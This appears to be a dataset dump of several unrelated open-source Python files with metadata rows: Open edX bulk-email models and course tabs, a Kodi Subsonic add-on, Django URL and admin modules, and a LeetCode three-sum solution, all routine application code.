argv = sys.argv[1:]
desc = REVERSE_HEX_DESC
rootparser = cli.base_argparser(program_name=os.path.basename(sys.argv[0]), description=desc)
rootparser.add_argument('address', type=argparse_utils.int16, action='store', default=None,
help='Specify the address of the record, or encompassed by the record')
rootparser.set_defaults(func=show_hex)
opts = rootparser.parse_args(argv)
# apply verbosity
cli.set_logging_level(opts)
# execute function
opts.func(opts)
return
|
gpl-3.0
| 3,501,183,569,568,600,600
| 30.889706
| 102
| 0.682038
| false
| 3.602159
| false
| false
| false
|
torchingloom/edx-platform
|
lms/djangoapps/bulk_email/models.py
|
1
|
11002
|
"""
Models for bulk email
WE'RE USING MIGRATIONS!
If you make changes to this model, be sure to create an appropriate migration
file and check it in at the same time as your model changes. To do that,
1. Go to the edx-platform dir
2. ./manage.py lms schemamigration bulk_email --auto description_of_your_change
3. Add the migration file created in edx-platform/lms/djangoapps/bulk_email/migrations/
"""
import logging
from django.db import models, transaction
from django.contrib.auth.models import User
from html_to_text import html_to_text
import hashlib
from django.conf import settings
from .fields import SeparatedValuesField
log = logging.getLogger(__name__)
# Bulk email to_options - the send to options that users can
# select from when they send email.
SEND_TO_MYSELF = 'myself'
SEND_TO_STAFF = 'staff'
SEND_TO_ALL = 'all'
SEND_TO_LIST = 'list'
SEND_TO_ALLALL = 'allall'
TO_OPTIONS = [SEND_TO_MYSELF, SEND_TO_STAFF, SEND_TO_LIST, SEND_TO_ALL, SEND_TO_ALLALL]
class Email(models.Model):
"""
Abstract base class for common information for an email.
"""
sender = models.ForeignKey(User, default=1, blank=True, null=True)
slug = models.CharField(max_length=128, db_index=True)
subject = models.CharField(max_length=128, blank=True)
html_message = models.TextField(null=True, blank=True)
text_message = models.TextField(null=True, blank=True)
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta: # pylint: disable=C0111
abstract = True
class CourseEmail(Email):
"""
Stores information for an email to a course.
"""
# Three options for sending that we provide from the instructor dashboard:
# * Myself: This sends an email to the staff member that is composing the email.
#
# * Staff and instructors: This sends an email to anyone in the staff group and
# anyone in the instructor group
#
# * All: This sends an email to anyone enrolled in the course, with any role
# (student, staff, or instructor)
#
TO_OPTION_CHOICES = (
(SEND_TO_MYSELF, 'Myself'),
(SEND_TO_STAFF, 'Staff and instructors'),
(SEND_TO_LIST, 'To list'),
(SEND_TO_ALL, 'All'),
(SEND_TO_ALLALL, 'AllAll')
)
course_id = models.CharField(max_length=255, db_index=True)
location = models.CharField(max_length=255, db_index=True, null=True, blank=True)
to_option = models.CharField(max_length=64, choices=TO_OPTION_CHOICES, default=SEND_TO_MYSELF)
to_list = SeparatedValuesField(null=True)
def __unicode__(self):
return self.subject
@classmethod
def create(cls, course_id, sender, to_option, subject, html_message, text_message=None, location=None, to_list=None):
"""
Create an instance of CourseEmail.
The CourseEmail.save_now method makes sure the CourseEmail entry is committed.
When called from any view that is wrapped by TransactionMiddleware,
and thus in a "commit-on-success" transaction, an autocommit buried within here
will cause any pending transaction to be committed by a successful
save here. Any future database operations will take place in a
separate transaction.
"""
# automatically generate the stripped version of the text from the HTML markup:
if text_message is None:
text_message = html_to_text(html_message)
# perform some validation here:
if to_option not in TO_OPTIONS:
fmt = 'Course email being sent to unrecognized to_option: "{to_option}" for "{course}", subject "{subject}"'
msg = fmt.format(to_option=to_option, course=course_id, subject=subject)
raise ValueError(msg)
# create the task, then save it immediately:
course_email = cls(
course_id=course_id,
sender=sender,
to_option=to_option,
subject=subject,
html_message=html_message,
text_message=text_message,
location=location,
to_list=to_list,
)
course_email.save_now()
return course_email
@transaction.autocommit
def save_now(self):
"""
Writes CourseEmail immediately, ensuring the transaction is committed.
Autocommit annotation makes sure the database entry is committed.
When called from any view that is wrapped by TransactionMiddleware,
and thus in a "commit-on-success" transaction, this autocommit here
will cause any pending transaction to be committed by a successful
save here. Any future database operations will take place in a
separate transaction.
"""
self.save()
def send(self):
from instructor_task.tasks import send_bulk_course_email
from instructor_task.api_helper import submit_task
from instructor.utils import DummyRequest
request = DummyRequest()
request.user = self.sender
email_obj = self
to_option = email_obj.to_option
task_type = 'bulk_course_email'
task_class = send_bulk_course_email
# Pass in the to_option as a separate argument, even though it's (currently)
# in the CourseEmail. That way it's visible in the progress status.
# (At some point in the future, we might take the recipient out of the CourseEmail,
# so that the same saved email can be sent to different recipients, as it is tested.)
task_input = {'email_id': self.id, 'to_option': to_option}
task_key_stub = "{email_id}_{to_option}".format(email_id=self.id, to_option=to_option)
# create the key value by using MD5 hash:
task_key = hashlib.md5(task_key_stub).hexdigest()
return submit_task(request, task_type, task_class, self.course_id, task_input, task_key)
class Optout(models.Model):
"""
Stores users that have opted out of receiving emails from a course.
"""
# Allowing null=True to support data migration from email->user.
# We need to first create the 'user' column with some sort of default in order to run the data migration,
# and given the unique index, 'null' is the best default value.
user = models.ForeignKey(User, db_index=True, null=True)
course_id = models.CharField(max_length=255, db_index=True)
class Meta: # pylint: disable=C0111
unique_together = ('user', 'course_id')
# Defines the tag that must appear in a template, to indicate
# the location where the email message body is to be inserted.
COURSE_EMAIL_MESSAGE_BODY_TAG = '{{message_body}}'
class CourseEmailTemplate(models.Model):
"""
Stores templates for all emails to a course to use.
This is expected to be a singleton, to be shared across all courses.
Initialization takes place in a migration that in turn loads a fixture.
The admin console interface disables add and delete operations.
Validation is handled in the CourseEmailTemplateForm class.
"""
html_template = models.TextField(null=True, blank=True)
plain_template = models.TextField(null=True, blank=True)
@staticmethod
def get_template():
"""
Fetch the current template
If one isn't stored, an exception is thrown.
"""
try:
return CourseEmailTemplate.objects.get()
except CourseEmailTemplate.DoesNotExist:
log.exception("Attempting to fetch a non-existent course email template")
raise
@staticmethod
def _render(format_string, message_body, context):
"""
Create a text message using a template, message body and context.
Convert message body (`message_body`) into an email message
using the provided template. The template is a format string,
which is rendered using format() with the provided `context` dict.
This doesn't insert user's text into template, until such time we can
support proper error handling due to errors in the message body
(e.g. due to the use of curly braces).
Instead, for now, we insert the message body *after* the substitutions
have been performed, so that anything in the message body that might
interfere will be innocently returned as-is.
Output is returned as a unicode string. It is not encoded as utf-8.
Such encoding is left to the email code, which will use the value
of settings.DEFAULT_CHARSET to encode the message.
"""
# If we wanted to support substitution, we'd call:
# format_string = format_string.replace(COURSE_EMAIL_MESSAGE_BODY_TAG, message_body)
result = format_string.format(**context)
# Note that the body tag in the template will now have been
# "formatted", so we need to do the same to the tag being
# searched for.
message_body_tag = COURSE_EMAIL_MESSAGE_BODY_TAG.format()
result = result.replace(message_body_tag, message_body, 1)
# finally, return the result, without converting to an encoded byte array.
return result
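        # Sketch with hypothetical values: the template
        # 'Dear {name},\n{{message_body}}\nRegards' and context {'name': 'Alice'}
        # first format to 'Dear Alice,\n{message_body}\nRegards'; the literal body
        # (even one containing curly braces) is then substituted for that tag.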
def render_plaintext(self, plaintext, context):
"""
Create plain text message.
Convert plain text body (`plaintext`) into plaintext email message using the
stored plain template and the provided `context` dict.
"""
return CourseEmailTemplate._render(self.plain_template, plaintext, context)
def render_htmltext(self, htmltext, context):
"""
Create HTML text message.
Convert HTML text body (`htmltext`) into HTML email message using the
stored HTML template and the provided `context` dict.
"""
return CourseEmailTemplate._render(self.html_template, htmltext, context)
class CourseAuthorization(models.Model):
"""
Enable the course email feature on a course-by-course basis.
"""
# The course that these features are attached to.
course_id = models.CharField(max_length=255, db_index=True, unique=True)
# Whether or not to enable instructor email
email_enabled = models.BooleanField(default=False)
@classmethod
def instructor_email_enabled(cls, course_id):
"""
Returns whether or not email is enabled for the given course id.
If email has not been explicitly enabled, returns False.
"""
# If settings.FEATURES['REQUIRE_COURSE_EMAIL_AUTH'] is
# set to False, then we enable email for every course.
if not settings.FEATURES['REQUIRE_COURSE_EMAIL_AUTH']:
return True
try:
record = cls.objects.get(course_id=course_id)
return record.email_enabled
except cls.DoesNotExist:
return False
def __unicode__(self):
not_en = "Not "
if self.email_enabled:
not_en = ""
return u"Course '{}': Instructor Email {}Enabled".format(self.course_id, not_en)
|
agpl-3.0
| 351,640,386,097,499,400
| 38.153025
| 121
| 0.668606
| false
| 4.14076
| false
| false
| false
|
xsteadfastx/subsonic-xbmc-addon
|
plugin.audio.subsonic/addon.py
|
1
|
11859
|
from operator import itemgetter
import sys
import urllib
import urlparse
sys.path.append('./resources/lib')
import requests
def build_url(query):
return base_url + '?' + urllib.urlencode(dict([k.encode('utf-8'),unicode(v).encode('utf-8')] for k,v in query.items()))
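    # For illustration (hypothetical plugin URL): with base_url set elsewhere to
    # 'plugin://plugin.audio.subsonic/', build_url({'mode': 'artist_list'}) returns
    # 'plugin://plugin.audio.subsonic/?mode=artist_list'.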
class Subsonic(object):
def __init__(self, url, username, password):
self.url = url
self.username = username
self.password = password
def api(self, method, parameters={'none': 'none'}):
return self.url + '/rest/' + method + '?u=%s&p=enc:%s&v=1.1.0&c=xbmc-subsonic&f=json&' % (
self.username, self.password.encode('hex')) + urllib.urlencode(parameters)
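    # For illustration (hypothetical server and credentials):
    # Subsonic('http://srv:4040', 'kodi', 'secret').api('ping.view') builds
    # 'http://srv:4040/rest/ping.view?u=kodi&p=enc:736563726574&v=1.1.0&c=xbmc-subsonic&f=json&none=none'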
def artist_list(self):
api_url = self.api('getIndexes.view',
parameters={'musicFolderId': '0'})
r = requests.get(api_url)
artists = []
for index in r.json()['subsonic-response']['indexes']['index']:
for artist in index['artist']:
item = {}
item['name'] = artist['name'].encode('utf-8')
item['id'] = artist['id'].encode('utf-8')
artists.append(item)
return artists
def music_directory_list(self, id):
api_url = self.api('getMusicDirectory.view',
parameters={'id': id})
r = requests.get(api_url)
return r.json()['subsonic-response']['directory']['child']
def genre_list(self):
api_url = self.api('getGenres.view')
r = requests.get(api_url)
return sorted(r.json()['subsonic-response']['genres']['genre'],
key=itemgetter('value'))
def albums_by_genre_list(self, genre):
api_url = self.api('getAlbumList.view',
parameters={'type': 'byGenre',
'genre': genre,
'size': '500'})
r = requests.get(api_url)
return r.json()['subsonic-response']['albumList']['album']
def random_songs_by_genre(self, genre):
api_url = self.api('getRandomSongs.view',
parameters={'size': '500',
'genre': genre})
r = requests.get(api_url)
return r.json()['subsonic-response']['randomSongs']['song']
def random_songs_from_to_year(self, from_year, to_year):
api_url = self.api('getRandomSongs.view',
parameters={'size': '500',
'fromYear': from_year,
'toYear': to_year})
r = requests.get(api_url)
return r.json()['subsonic-response']['randomSongs']['song']
def cover_art(self, id):
return self.api('getCoverArt.view', parameters={'id': id})
def main_page():
menu = [{'mode': 'artist_list', 'foldername': 'Artists'},
{'mode': 'genre_list', 'foldername': 'Genres'},
{'mode': 'random_list', 'foldername': 'Random'}]
for entry in menu:
url = build_url(entry)
li = xbmcgui.ListItem(entry['foldername'],
iconImage='DefaultFolder.png')
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li,
isFolder=True)
xbmcplugin.endOfDirectory(addon_handle)
def genre_list():
subsonic = Subsonic(subsonic_url, username, password)
genres = subsonic.genre_list()
for genre in genres:
url = build_url({'mode': 'albums_by_genre_list',
'foldername': genre['value']})
li = xbmcgui.ListItem(genre['value'],
iconImage='DefaultFolder.png')
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li,
isFolder=True)
xbmcplugin.endOfDirectory(addon_handle)
def albums_by_genre_list():
genre = args.get('foldername', None)
subsonic = Subsonic(subsonic_url, username, password)
albums = subsonic.albums_by_genre_list(genre[0])
for album in albums:
url = build_url({'mode': 'track_list',
'foldername': unicode(album['title']).encode('utf-8'),
'album_id': unicode(album['id']).encode('utf-8')})
li = xbmcgui.ListItem(album['artist'] + ' - ' + album['title'])
li.setIconImage(subsonic.cover_art(album['id']))
li.setThumbnailImage(subsonic.cover_art(album['id']))
li.setProperty('fanart_image', subsonic.cover_art(album['id']))
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li,
isFolder=True)
xbmcplugin.endOfDirectory(addon_handle)
def artist_list():
subsonic = Subsonic(subsonic_url, username, password)
artists = subsonic.artist_list()
for artist in artists:
url = build_url({'mode': 'album_list',
'foldername': artist['name'],
'artist_id': artist['id']})
li = xbmcgui.ListItem(artist['name'])
li.setIconImage(subsonic.cover_art(artist['id']))
li.setThumbnailImage(subsonic.cover_art(artist['id']))
li.setProperty('fanart_image', subsonic.cover_art(artist['id']))
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li,
isFolder=True)
xbmcplugin.endOfDirectory(addon_handle)
def album_list():
artist_id = args.get('artist_id', None)
subsonic = Subsonic(subsonic_url, username, password)
albums = subsonic.music_directory_list(artist_id[0])
for album in albums:
url = build_url({'mode': 'track_list',
'foldername': unicode(album['title']).encode('utf-8'),
'album_id': unicode(album['id']).encode('utf-8')})
li = xbmcgui.ListItem(album['title'])
li.setIconImage(subsonic.cover_art(album['id']))
li.setThumbnailImage(subsonic.cover_art(album['id']))
li.setProperty('fanart_image', subsonic.cover_art(album['id']))
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li,
isFolder=True)
xbmcplugin.endOfDirectory(addon_handle)
def track_list():
album_id = args.get('album_id', None)
subsonic = Subsonic(subsonic_url, username, password)
tracks = subsonic.music_directory_list(album_id[0])
for track in tracks:
url = subsonic.api(
'stream.view',
parameters={'id': track['id'],
'maxBitRate': bitrate,
'format': trans_format})
li = xbmcgui.ListItem(track['title'])
li.setIconImage(subsonic.cover_art(track['id']))
li.setThumbnailImage(subsonic.cover_art(track['id']))
li.setProperty('fanart_image', subsonic.cover_art(track['id']))
li.setProperty('IsPlayable', 'true')
li.setInfo(
type='Music',
infoLabels={'Artist': track['artist'],
'Title': track['title']})
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li)
xbmcplugin.endOfDirectory(addon_handle)
def random_list():
menu = [{'mode': 'random_by_genre_list', 'foldername': 'by Genre'},
{'mode': 'random_from_to_year_list', 'foldername': 'from - to Year'}]
for entry in menu:
url = build_url(entry)
li = xbmcgui.ListItem(entry['foldername'],
iconImage='DefaultFolder.png')
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li,
isFolder=True)
xbmcplugin.endOfDirectory(addon_handle)
def random_by_genre_list():
subsonic = Subsonic(subsonic_url, username, password)
genres = subsonic.genre_list()
for genre in genres:
url = build_url({'mode': 'random_by_genre_track_list',
'foldername': genre['value']})
li = xbmcgui.ListItem(genre['value'],
iconImage='DefaultFolder.png')
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li,
isFolder=True)
xbmcplugin.endOfDirectory(addon_handle)
def random_by_genre_track_list():
genre = args.get('foldername', None)[0]
subsonic = Subsonic(subsonic_url, username, password)
tracks = subsonic.random_songs_by_genre(genre)
for track in tracks:
url = subsonic.api(
'stream.view',
parameters={'id': track['id'],
'maxBitRate': bitrate,
'format': trans_format})
li = xbmcgui.ListItem(track['artist'] + ' - ' + track['title'])
li.setIconImage(subsonic.cover_art(track['id']))
li.setThumbnailImage(subsonic.cover_art(track['id']))
li.setProperty('fanart_image', subsonic.cover_art(track['id']))
li.setProperty('IsPlayable', 'true')
li.setInfo(
type='Music',
infoLabels={'Artist': track['artist'],
'Title': track['title']})
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li)
xbmcplugin.endOfDirectory(addon_handle)
def random_from_to_year_list():
dialog = xbmcgui.Dialog()
from_year = dialog.input('From Year', type=xbmcgui.INPUT_NUMERIC)
dialog = xbmcgui.Dialog()
to_year = dialog.input('To Year', type=xbmcgui.INPUT_NUMERIC)
subsonic = Subsonic(subsonic_url, username, password)
tracks = subsonic.random_songs_from_to_year(from_year, to_year)
for track in tracks:
url = subsonic.api(
'stream.view',
parameters={'id': track['id'],
'maxBitRate': bitrate,
'format': trans_format})
li = xbmcgui.ListItem(track['artist'] + ' - ' + track['title'])
li.setIconImage(subsonic.cover_art(track['id']))
li.setThumbnailImage(subsonic.cover_art(track['id']))
li.setProperty('fanart_image', subsonic.cover_art(track['id']))
li.setProperty('IsPlayable', 'true')
li.setInfo(
type='Music',
infoLabels={'Artist': track['artist'],
'Title': track['title']})
xbmcplugin.addDirectoryItem(
handle=addon_handle,
url=url,
listitem=li)
xbmcplugin.endOfDirectory(addon_handle)
if __name__ == '__main__':
import xbmcaddon
import xbmcgui
import xbmcplugin
my_addon = xbmcaddon.Addon('plugin.audio.subsonic')
subsonic_url = my_addon.getSetting('subsonic_url')
username = my_addon.getSetting('username')
password = my_addon.getSetting('password')
trans_format = my_addon.getSetting('format')
bitrate = my_addon.getSetting('bitrate')
base_url = sys.argv[0]
addon_handle = int(sys.argv[1])
args = urlparse.parse_qs(sys.argv[2][1:])
xbmcplugin.setContent(addon_handle, 'songs')
mode = args.get('mode', None)
if mode is None:
main_page()
elif mode[0] == 'artist_list':
artist_list()
elif mode[0] == 'album_list':
album_list()
elif mode[0] == 'track_list':
track_list()
elif mode[0] == 'genre_list':
genre_list()
elif mode[0] == 'albums_by_genre_list':
albums_by_genre_list()
elif mode[0] == 'random_list':
random_list()
elif mode[0] == 'random_by_genre_list':
random_by_genre_list()
elif mode[0] == 'random_by_genre_track_list':
random_by_genre_track_list()
elif mode[0] == 'random_from_to_year_list':
random_from_to_year_list()
|
mit
| 1,125,825,423,453,675,600
| 34.71988
| 123
| 0.559912
| false
| 3.752848
| false
| false
| false
|
CCallahanIV/PyChart
|
pychart/pychart_datarender/urls.py
|
1
|
1210
|
"""Url patterns for data render app."""
from django.conf.urls import url
from pychart_datarender.views import (
GalleryView,
DataDetailView,
RenderDetailView,
DataLibraryView,
EditDataView,
EditRenderView,
AddDataView,
AddRenderView,
retrieve_data,
render_data,
save_render,
add_owner_view
)
urlpatterns = [
url(r'^gallery/$', GalleryView.as_view(), name='gallery'),
url(r'^(?P<pk>\d+)/$', DataDetailView.as_view(), name='data_detail'),
url(r'^render/(?P<pk>\d+)/$', RenderDetailView.as_view(), name='render_detail'),
url(r'^(?P<pk>\d+)/edit/$', EditDataView.as_view(), name='data_edit'),
url(r'^render/(?P<pk>\d+)/edit/$', EditRenderView.as_view(), name='render_edit'),
url(r'^render/add/$', AddRenderView.as_view(), name='render_add'),
url(r'^retrieve/(?P<pk>\d+)$', retrieve_data, name="get_data"),
url(r'^retrieve/render/$', render_data, name="get_render"),
url(r'^add/$', AddDataView.as_view(), name='data_add'),
url(r'^add/(?P<pk>\d+)$', add_owner_view, name='add_owner'),
url(r'^library/$', DataLibraryView.as_view(), name='data_library_view'),
url(r'^render/create/$', save_render, name="save_render")
]
|
mit
| -4,373,423,737,442,494,000
| 36.8125
| 85
| 0.628099
| false
| 3.192612
| false
| false
| false
|
lemming52/white_pawn
|
leetcode/q015/solution.py
|
1
|
1080
|
"""
Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.
Note:
The solution set must not contain duplicate triplets.
"""
from typing import Dict, List
class Solution:
def threeSum(self, nums: List[int]) -> List[List[int]]:
nums = sorted(nums)
found = {}
results = []
for i, a in enumerate(nums):
j = i + 1
k = len(nums) - 1
if a > 0:
break
while j < k:
b = nums[j]
c = nums[k]
total = a + b + c
                if total == 0:
                    key = f"{a},{b},{c}"  # separators avoid digit-concatenation collisions
                    if key not in found:
                        found[key] = True
                        results.append([a, b, c])
                    # always advance both pointers here; leaving them unchanged on a
                    # duplicate triplet would loop forever
                    j += 1
                    k -= 1
elif total > 0:
k -= 1
else:
j += 1
return results
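# --- Tiny sanity check (editor's addition, not from the original solution) ---
# For the classic example input the unique zero-sum triplets are
# [-1, -1, 2] and [-1, 0, 1].
if __name__ == "__main__":
    assert sorted(Solution().threeSum([-1, 0, 1, 2, -1, -4])) == [[-1, -1, 2], [-1, 0, 1]]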
|
mit
| 6,733,637,827,880,332,000
| 27.243243
| 161
| 0.39537
| false
| 4.42623
| false
| false
| false
|
jbassen/edx-platform
|
lms/djangoapps/courseware/tabs.py
|
1
|
10813
|
"""
This module is essentially a broker to xmodule/tabs.py -- it was originally introduced to
perform some LMS-specific tab display gymnastics for the Entrance Exams feature
"""
from django.conf import settings
from django.utils.translation import ugettext as _, ugettext_noop
from courseware.access import has_access
from courseware.entrance_exams import user_must_complete_entrance_exam
from student.models import UserProfile
from openedx.core.lib.course_tabs import CourseTabPluginManager
from student.models import CourseEnrollment
from xmodule.tabs import CourseTab, CourseTabList, key_checker
from xmodule.tabs import StaticTab
class EnrolledTab(CourseTab):
"""
A base class for any view types that require a user to be enrolled.
"""
@classmethod
def is_enabled(cls, course, user=None):
if user is None:
return True
return bool(CourseEnrollment.is_enrolled(user, course.id) or has_access(user, 'staff', course, course.id))
class CoursewareTab(EnrolledTab):
"""
The main courseware view.
"""
type = 'courseware'
title = ugettext_noop('Courseware')
priority = 10
view_name = 'courseware'
is_movable = False
is_default = False
is_visible_to_sneak_peek = True
class CourseInfoTab(CourseTab):
"""
The course info view.
"""
type = 'course_info'
title = ugettext_noop('Course Info')
priority = 20
view_name = 'info'
tab_id = 'info'
is_movable = False
is_default = False
is_visible_to_sneak_peek = True
@classmethod
def is_enabled(cls, course, user=None):
return True
class SyllabusTab(EnrolledTab):
"""
A tab for the course syllabus.
"""
type = 'syllabus'
title = ugettext_noop('Syllabus')
priority = 30
view_name = 'syllabus'
allow_multiple = True
is_default = False
is_visible_to_sneak_peek = True
@classmethod
def is_enabled(cls, course, user=None):
if not super(SyllabusTab, cls).is_enabled(course, user=user):
return False
return getattr(course, 'syllabus_present', False)
class ProgressTab(EnrolledTab):
"""
The course progress view.
"""
type = 'progress'
title = ugettext_noop('Progress')
priority = 40
view_name = 'progress'
is_hideable = True
is_default = False
@classmethod
def is_enabled(cls, course, user=None): # pylint: disable=unused-argument
if not super(ProgressTab, cls).is_enabled(course, user=user):
return False
return not course.hide_progress_tab
class TextbookTabsBase(CourseTab):
"""
Abstract class for textbook collection tabs classes.
"""
# Translators: 'Textbooks' refers to the tab in the course that leads to the course' textbooks
title = ugettext_noop("Textbooks")
is_collection = True
is_default = False
@classmethod
def is_enabled(cls, course, user=None): # pylint: disable=unused-argument
return user is None or user.is_authenticated()
@classmethod
def items(cls, course):
"""
A generator for iterating through all the SingleTextbookTab book objects associated with this
collection of textbooks.
"""
raise NotImplementedError()
class TextbookTabs(TextbookTabsBase):
"""
A tab representing the collection of all textbook tabs.
"""
type = 'textbooks'
priority = None
view_name = 'book'
@classmethod
def is_enabled(cls, course, user=None): # pylint: disable=unused-argument
parent_is_enabled = super(TextbookTabs, cls).is_enabled(course, user)
return settings.FEATURES.get('ENABLE_TEXTBOOK') and parent_is_enabled
@classmethod
def items(cls, course):
for index, textbook in enumerate(course.textbooks):
yield SingleTextbookTab(
name=textbook.title,
tab_id='textbook/{0}'.format(index),
view_name=cls.view_name,
index=index
)
class PDFTextbookTabs(TextbookTabsBase):
"""
A tab representing the collection of all PDF textbook tabs.
"""
type = 'pdf_textbooks'
priority = None
view_name = 'pdf_book'
@classmethod
def items(cls, course):
for index, textbook in enumerate(course.pdf_textbooks):
yield SingleTextbookTab(
name=textbook['tab_title'],
tab_id='pdftextbook/{0}'.format(index),
view_name=cls.view_name,
index=index
)
class HtmlTextbookTabs(TextbookTabsBase):
"""
A tab representing the collection of all Html textbook tabs.
"""
type = 'html_textbooks'
priority = None
view_name = 'html_book'
@classmethod
def items(cls, course):
for index, textbook in enumerate(course.html_textbooks):
yield SingleTextbookTab(
name=textbook['tab_title'],
tab_id='htmltextbook/{0}'.format(index),
view_name=cls.view_name,
index=index
)
class LinkTab(CourseTab):
"""
Abstract class for tabs that contain external links.
"""
link_value = ''
def __init__(self, tab_dict=None, name=None, link=None):
self.link_value = tab_dict['link'] if tab_dict else link
def link_value_func(_course, _reverse_func):
""" Returns the link_value as the link. """
return self.link_value
self.type = tab_dict['type']
tab_dict['link_func'] = link_value_func
super(LinkTab, self).__init__(tab_dict)
def __getitem__(self, key):
if key == 'link':
return self.link_value
else:
return super(LinkTab, self).__getitem__(key)
def __setitem__(self, key, value):
if key == 'link':
self.link_value = value
else:
super(LinkTab, self).__setitem__(key, value)
def to_json(self):
to_json_val = super(LinkTab, self).to_json()
to_json_val.update({'link': self.link_value})
return to_json_val
def __eq__(self, other):
if not super(LinkTab, self).__eq__(other):
return False
return self.link_value == other.get('link')
@classmethod
def is_enabled(cls, course, user=None): # pylint: disable=unused-argument
return True
class ExternalDiscussionCourseTab(LinkTab):
"""
A course tab that links to an external discussion service.
"""
type = 'external_discussion'
# Translators: 'Discussion' refers to the tab in the courseware that leads to the discussion forums
title = ugettext_noop('Discussion')
priority = None
is_default = False
@classmethod
def validate(cls, tab_dict, raise_error=True):
""" Validate that the tab_dict for this course tab has the necessary information to render. """
return (super(ExternalDiscussionCourseTab, cls).validate(tab_dict, raise_error) and
key_checker(['link'])(tab_dict, raise_error))
@classmethod
def is_enabled(cls, course, user=None): # pylint: disable=unused-argument
if not super(ExternalDiscussionCourseTab, cls).is_enabled(course, user=user):
return False
return course.discussion_link
class ExternalLinkCourseTab(LinkTab):
"""
A course tab containing an external link.
"""
type = 'external_link'
priority = None
is_default = False # An external link tab is not added to a course by default
allow_multiple = True
@classmethod
def validate(cls, tab_dict, raise_error=True):
""" Validate that the tab_dict for this course tab has the necessary information to render. """
return (super(ExternalLinkCourseTab, cls).validate(tab_dict, raise_error) and
key_checker(['link', 'name'])(tab_dict, raise_error))
class SingleTextbookTab(CourseTab):
"""
A tab representing a single textbook. It is created temporarily when enumerating all textbooks within a
Textbook collection tab. It should not be serialized or persisted.
"""
type = 'single_textbook'
is_movable = False
is_collection_item = True
priority = None
def __init__(self, name, tab_id, view_name, index):
def link_func(course, reverse_func, index=index):
""" Constructs a link for textbooks from a view name, a course, and an index. """
return reverse_func(view_name, args=[unicode(course.id), index])
tab_dict = dict()
tab_dict['name'] = name
tab_dict['tab_id'] = tab_id
tab_dict['link_func'] = link_func
super(SingleTextbookTab, self).__init__(tab_dict)
def to_json(self):
raise NotImplementedError('SingleTextbookTab should not be serialized.')
def get_course_tab_list(request, course):
"""
Retrieves the course tab list from xmodule.tabs and manipulates the set as necessary
"""
user = request.user
is_user_enrolled = user.is_authenticated() and CourseEnrollment.is_enrolled(user, course.id)
xmodule_tab_list = CourseTabList.iterate_displayable(
course,
user=user,
settings=settings,
is_user_authenticated=user.is_authenticated(),
is_user_staff=has_access(user, 'staff', course, course.id),
is_user_enrolled=is_user_enrolled,
is_user_sneakpeek=not UserProfile.has_registered(user),
)
# Now that we've loaded the tabs for this course, perform the Entrance Exam work.
# If the user has to take an entrance exam, we'll need to hide away all but the
# "Courseware" tab. The tab is then renamed as "Entrance Exam".
course_tab_list = []
for tab in xmodule_tab_list:
if user_must_complete_entrance_exam(request, user, course):
# Hide all of the tabs except for 'Courseware'
# Rename 'Courseware' tab to 'Entrance Exam'
            if tab.type != 'courseware':
continue
tab.name = _("Entrance Exam")
course_tab_list.append(tab)
# Add in any dynamic tabs, i.e. those that are not persisted
course_tab_list += _get_dynamic_tabs(course, user)
return course_tab_list
def _get_dynamic_tabs(course, user):
"""
Returns the dynamic tab types for the current user.
Note: dynamic tabs are those that are not persisted in the course, but are
instead added dynamically based upon the user's role.
"""
dynamic_tabs = list()
for tab_type in CourseTabPluginManager.get_tab_types():
if getattr(tab_type, "is_dynamic", False):
tab = tab_type(dict())
if tab.is_enabled(course, user=user):
dynamic_tabs.append(tab)
dynamic_tabs.sort(key=lambda dynamic_tab: dynamic_tab.name)
return dynamic_tabs
|
agpl-3.0
| 6,793,054,819,562,622,000
| 30.896755
| 114
| 0.638121
| false
| 3.950676
| false
| false
| false
|
openpolis/op-verify
|
project/verify/admin.py
|
1
|
2315
|
from django.contrib import admin
from django.core.management import call_command, CommandError
from django.http import StreamingHttpResponse
from .models import Rule, Verification
__author__ = 'guglielmo'
def run_verification(request, id):
response = StreamingHttpResponse(stream_generator(request, id), content_type="text/html")
return response
def stream_generator(request, id):
rule = Rule.objects.get(pk=id)
yield "Verifying rule: %s ... <br/>" % rule # Returns a chunk of the response to the browser
yield " " * 1000
try:
call_command(rule.task, rule_id=rule.pk, verbosity='2', username=request.user.username)
yield " Rule verification terminated. Status: {0}<br/>".format(rule.status)
yield ' Go back to <a href="/admin/verify/rule/{0}">rule page</a>.<br/>'.format(rule.id)
yield " " * 1000
except CommandError as e:
yield " ! %s<br/>" % e
yield " " * 1000
except Exception as e:
yield " ! Error in execution: %s<br/>" % e
yield " " * 1000
class VerificationInline(admin.TabularInline):
model = Verification
extra = 0
exclude = ('csv_report', )
list_display = readonly_fields = ('launch_ts', 'duration', 'outcome', 'user', 'csv_report_link', 'parameters')
def get_queryset(self, request):
return super(VerificationInline, self).get_queryset(request).order_by('-launch_ts')
class RuleAdmin(admin.ModelAdmin):
list_display = ['__unicode__', 'tags', 'status', 'last_launched_at', 'notes']
inlines = [VerificationInline,]
search_fields = ['title', 'tags']
buttons = [
{
'url': 'run_verification',
'textname': 'Run verification',
'func': run_verification,
},
]
    def change_view(self, request, object_id, form_url='', extra_context=None):
        extra_context = extra_context or {}
        extra_context['buttons'] = self.buttons
        return super(RuleAdmin, self).change_view(request, object_id, form_url, extra_context=extra_context)
def get_urls(self):
from django.conf.urls import patterns, url, include
urls = super(RuleAdmin, self).get_urls()
my_urls = list( (url(r'^(.+)/%(url)s/$' % b, self.admin_site.admin_view(b['func'])) for b in self.buttons) )
return my_urls + urls
admin.site.register(Rule, RuleAdmin)
|
bsd-3-clause
| -7,814,162,677,733,859,000
| 35.746032
| 116
| 0.638013
| false
| 3.639937
| false
| false
| false
|
googleads/google-ads-python
|
google/ads/googleads/v8/services/services/ad_schedule_view_service/client.py
|
1
|
18238
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
